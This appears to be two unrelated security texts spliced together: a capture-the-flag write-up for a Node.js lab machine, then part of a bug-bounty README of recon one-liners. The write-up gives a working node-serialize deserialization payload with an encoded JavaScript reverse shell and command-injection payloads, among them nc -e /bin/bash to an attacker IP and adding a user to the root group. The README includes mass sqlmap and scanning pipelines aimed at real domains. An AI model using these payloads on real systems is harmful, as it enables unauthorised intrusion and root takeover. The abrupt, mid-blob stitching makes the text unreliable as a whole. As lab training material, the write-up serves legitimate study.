LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKQ== Connection: close {"color-theme":"dark"} ``` ### Custom 2 Exploit part 1. ```bash {"rce":"_$$ND_FUNC$$_function () { # payload goes here }()" } ``` Exploit part 2. ```bash {"rce":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,52,57,46,49,51,50,34,59,10,80,79,82,84,61,34,52,52,51,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()" } ``` Exploit part 3. ```bash echo 'javascript' | base64 -w0 ``` Exploit part 4. ```bash profile='payload' ``` ### Custom 3 ```bash # login using dev-acct:password # fire-up FoxyProxy # toggle color-theme # add the following to the web-request "admin":"true" # forward the request # reload the page # forward the request # verify you have the Backup logs function on the screen now # put "test" in the text-box and forward to Intruder # use Sniper to try different command injection options & payload & # doesn't like forward slashes (encoded or not) # tried ping -c2 192.168.49.132 # this works wget http://192.168.49.132/test.txt # no query seen by tcpdump (slash is filtered) curl http://192.168.49.132/test.txt # no query seen by tcpdump (slash is filtered) nc 192.168.49.132 443 # no query seen by tcpdump echo 'foo' | base64 # response code: 200 echo 'foo:bar' # response code: 200 useradd dork -g root # response code: 200 echo -e "password\npassword" | passwd dork # response code: 200 echo -n 'wget http://192.168.49.83' | od -A n -t x1 | sed 's/ /\\x/g' # output is hex # use this as the payload echo -e '\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x39\x2e\x38\x33' | sh ``` # Solution ```bash # login using dev-acct:password # fire-up FoxyProxy # toggle color-theme # add the following to the web-request "admin":"true" # forward the request # reload the page # forward the request # verify you have the Backup logs function on the screen now # clicked-on 'Backup logs' button # captured HTTP request using Burp Suite # sent HTTP request to Intruder # cleared all assumed positions # used this ...filename=$$ for the position # created a file with the lines below and loaded the file (under the Payload tab) # fired-up a Netcat session for port 80 & ping -c2 192.168.49.198 & & wget http://192.168.49.198/ & & curl http://192.168.49.198/ & & nc 192.168.49.198 -e '/bin/bash' 80 & uname -a # output Linux interface 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux ``` # Explore NSTR # Escalate NSTR # Lessons Learned * If LFI, RFI, SQLi fails try Command Injection via Intruder from the Burp Suite * Getting a 500 HTTP Server code is not always bad * Use Patator for brute-forcing HTTP login forms that contain/require JSON * If you see a JSON-relevant page (like /api/settings or /api/users) follow it for enumeration purposes * In big username/password dumps, look for entries that stand out: dev, dev-acct, admin, test * Sort and scrub wordlists for unique values * Helpful tools: Patator, Burp Suite Intruder * Dirb eventually found the /api/backup page (function); this should have been an indicator in itself # Walkthrough ## Hints - Enumeration: Can you view all the users? - Password Bruteforce: Try spraying with very common passwords. - Remote Code Execution: You could try injecting something... ## Exploitation Guide ```bash Summary We’ll brute-force user credentials in a NodeJS web application to gain a foothold on this target. We’ll then exploit an OS command injection vulnerability in the same application to obtain a root shell. Enumeration Nmap Let’s begin with a simple nmap TCP scan: kali@kali:~$ sudo nmap -p- 192.168.120.127 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 12:05 EDT Nmap scan report for 192.168.120.127 Host is up (0.031s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http We’ll further scan the application on port 80 in an attempt to further identify the server type. kali@kali:~$ sudo nmap -p 80 192.168.120.127 -sV Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 12:08 EDT Nmap scan report for 192.168.120.127 Host is up (0.031s latency). PORT STATE SERVICE VERSION 80/tcp open http Node.js Express framework This appears to be a web server running NodeJS Express. Web Enumeration Let’s set up the web browser to use Burp proxy to help identify the exact requests the front-end interface is making to the server. After visiting the default web page (http://192.168.120.127/), we observe the following: a GET request is sent to /api/settings that results in HTTP/1.1 401 Unauthorized a GET request is sent to /api/users that results in HTTP/1.1 200 OK The page also contains a list of “Top Users”: 1. zachery 2. burt 3. mary 4. evan 5. clare 6. rickie 7. orlando 8. twila 9. zachariah 10. joy When we click on the Dark button, we observe the following POST request: POST /api/settings HTTP/1.1 Host: 192.168.120.127 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 22 Origin: http://192.168.120.127 Connection: close Referer: http://192.168.120.127/ {"color-theme":"dark"} The response is as follows: HTTP/1.1 401 Unauthorized X-Powered-By: Express Content-Type: text/plain; charset=utf-8 Content-Length: 12 ETag: W/"c-dAuDFQrdjS3hezqxDTNgW7AOlYk" Date: Mon, 12 Oct 2020 13:01:47 GMT Connection: close Unauthorized We’ll take a note of this information and move on. Exploitation Leaking More Users Navigating to /api/users, we receive the following response: HTTP/1.1 304 Not Modified X-Powered-By: Express ETag: W/"44df-Bn+qiRrYHrX450lifQ2et5+YwdY" Date: Fri, 09 Oct 2020 16:17:56 GMT Connection: close More importantly, the content includes the application’s entire user list: kali@kali:~$ curl http://192.168.120.127/api/users ["frieda","delia","luisa","clyde","colby","stephanie","marion","fredric","georgina","flora","jonas", ... "amos","tammy","spencer","elma","graciela","lester","eula","dev-acct","shaun","laurie","cedric","rhea", ... Password Spray Next, let’s try to log in with test credentials. This provides the following response: POST /login HTTP/1.1 Host: 192.168.120.127 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 37 Origin: http://192.168.120.127 Connection: close Referer: http://192.168.120.127/ {"username":"test","password":"test"} This generates a failure. HTTP/1.1 401 Unauthorized X-Powered-By: Express Date: Fri, 09 Oct 2020 16:21:03 GMT Connection: close Content-Length: 12 Unauthorized Let’s password-spray the users with the password of password. We’ll install the jq package to assist with this, capturing the usernames one-per-row: kali@kali:~$ sudo apt-get install jq -y Get:1 http://kali.download/kali kali-rolling/main amd64 libonig5 amd64 6.9.5-2 [182 kB] Get:2 http://kali.download/kali kali-rolling/main amd64 libjq1 amd64 1.6-1 [133 kB] Get:3 http://kali.download/kali kali-rolling/main amd64 jq amd64 1.6-1 [63.4 kB] Fetched 378 kB in 1s (444 kB/s) ... kali@kali:~$ Now we can fetch the user list and pipe it into jq: kali@kali:~$ curl http://192.168.120.127/api/users | jq '.[]' -r > users.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 17631 100 17631 0 0 175k 0 --:--:-- --:--:-- --:--:-- 173k kali@kali:~$ head users.txt frieda delia luisa clyde colby stephanie marion fredric georgina flora kali@kali:~$ We’ll use a bash script to perform the password spray, using this username list as input. kali@kali:~$ for user in $(cat users.txt); do curl 'http://192.168.120.127/login' --data "{\"username\":\"${user}\",\"password\":\"password\"}" -H "Content-Type: application/json" 2>/dev/null | grep -v Unauthorized && echo $user ; done OK dev-acct kali@kali:~$ Impersonating Admin User We are able to login successfully with the dev-acct:password credentials. As we log in to the website with these credentials, the login form disappears, allowing us to further investigate the /api/settings endpoint. The Burp history reveals that our POST request to /api/settings now returns a 200 OK instead of 401 Unauthorized. In addition, the POST requests are returning JSON data containing our account settings: {"color-theme":"light","lang":"en","admin":false} Let’s click on the Dark button and then forward the captured request to the Repeater tab in Burp. In the body of the request, we’ll append "admin":true to the JSON as follows: POST /api/settings HTTP/1.1 Host: 192.168.120.127 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 35 Origin: http://192.168.120.127 Connection: close Referer: http://192.168.120.127/ Cookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA {"color-theme":"dark","admin":true} After we send this to the server, all subsequent requests now include "admin":true. That means that we are now successfully impersonating the admin user in the application. Command Injection When we refresh the page, we discover that we can now perform a backup of the web app’s log files. The interface contains a text field (with the default value of Logbackup), and a Backup Logs button. Leaving the text field blank and clicking the button returns the following: Backup created Created backup: Created backup: /var/log/app/logfile-undefined.1602522817206.gz Let’s attempt command injection on this field. For example, we can attempt to instruct the target to send ICMP requests to our attack machine with the following payload: ; ping -c 2 192.168.118.3; Here’s the request: GET /api/backup?filename=;%20ping%20-c%202%20192.168.118.3; HTTP/1.1 Host: 192.168.120.127 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.120.127/ Cookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA Let’s run tcpdump, filtering for ICMP packets. kali@kali:~$ sudo tcpdump -i tap0 icmp tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tap0, link-type EN10MB (Ethernet), capture size 262144 bytes 13:03:59.804083 IP 192.168.120.127 > kali: ICMP echo request, id 900, seq 1, length 64 13:03:59.804276 IP kali > 192.168.120.127: ICMP echo reply, id 900, seq 1, length 64 13:04:00.806200 IP 192.168.120.127 > kali: ICMP echo request, id 900, seq 2, length 64 13:04:00.806252 IP kali > 192.168.120.127: ICMP echo reply, id 900, seq 2, length 64 ^C 4 packets captured 4 packets received by filter 4 packets dropped by kernel kali@kali:~$ This reveals that the target machine indeed pinged our attack machine. We have obtained command injection. Reverse Shell Leveraging this command injection vulnerability, let’s attempt to upgrade to a reverse shell. We’ll start a netcat listener on port 4444 and then use the following payload to send the shell: GET /api/backup?filename=;%20nc%20192.168.118.3%204444%20-e%20/bin/sh; HTTP/1.1 Host: 192.168.120.127 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.120.127/ Cookie: connect.sid=s%3AKOYlSeEABkSVNpIYQj3XwAhlitHWC8lt.Fb%2Be3zVcpIClXV1Q4xNOShygp0xWFiywDm%2FNPLLRh%2FA We receive a shell. kali@kali:~$ nc -lvp 4444 listening on [any] 4444 ... 192.168.120.127: inverse host lookup failed: Unknown host connect to [192.168.118.3] from (UNKNOWN) [192.168.120.127] 57636 python -c 'import pty; pty.spawn("/bin/bash")' root@interface:/var/www/app/dist# whoami whoami root root@interface:/var/www/app/dist# Not only have we obtained a shell, but because the web server was misconfigured to run as root, we’ve obtained a root shell! ```
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Axiom](https://github.com/pry0cc/axiom) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### .bashrc shortcut. ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it 